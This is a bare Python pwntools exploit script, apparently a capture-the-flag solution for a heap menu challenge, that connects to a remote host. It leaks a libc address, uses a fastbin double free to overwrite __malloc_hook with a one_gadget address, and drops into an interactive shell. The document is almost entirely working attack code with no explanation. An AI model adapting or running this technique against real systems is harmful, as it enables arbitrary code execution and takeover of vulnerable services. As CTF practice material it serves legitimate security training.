from pwn import *
from LibcSearcher import *
def conn():
global r,Libc,elf
#r = process("./pwn14")
Libc = ELF("./libc-2.23.so")
r = remote("1.95.36.136", 2136)
#elf = ELF("./pwn1")
def add(x,y):
r.sendlineafter(b"choice:\n",b"1")
r.sendlineafter(b"index:\n",str(x).encode())
r.sendlineafter(b"size:\n",str(y).encode())
def edit(x,y):
r.sendlineafter(b"choice:\n",b"3")
r.sendlineafter(b"index:\n",str(x).encode())
r.sendlineafter(b"length:\n",str(len(y)).encode())
r.sendlineafter(b"content:\n",y)
def free(x):
r.sendlineafter(b"choice:\n",b"2")
r.sendlineafter(b"index:\n",str(x).encode())
def show(x):
r.sendlineafter(b"choice:\n",b"4")
r.sendlineafter(b"index:\n",str(x).encode())
def pwn():
add(0,0x1000)
add(1,0x10)
free(0)
add(0,0x1000)
show(0)
libc = u64(r.recvline()[:-1].ljust(8,b"\x00"))-3951480
print("libc>>>",hex(libc))
add(0,0x68)
add(1,0x68)
free(0)
free(1)
free(0)
add(0,0x68)
malloc = libc + Libc.sym["__malloc_hook"]
edit(0,p64(malloc-0x23))
add(1,0x68)
add(2,0x68)
add(3,0x68)
one = [0x4527a,0xf03a4,0xf1247]
onegadget = libc+one[1]
edit(3,b"\x00"*(0x13)+p64(onegadget)+b'\x00'*8) #onegadget -> relloc_hook
print("onegadget>>>",hex(onegadget))
add(4,0)
#gdb.attach(r)
r.interactive()
conn()
pwn()
浙公网安备 33010602011771号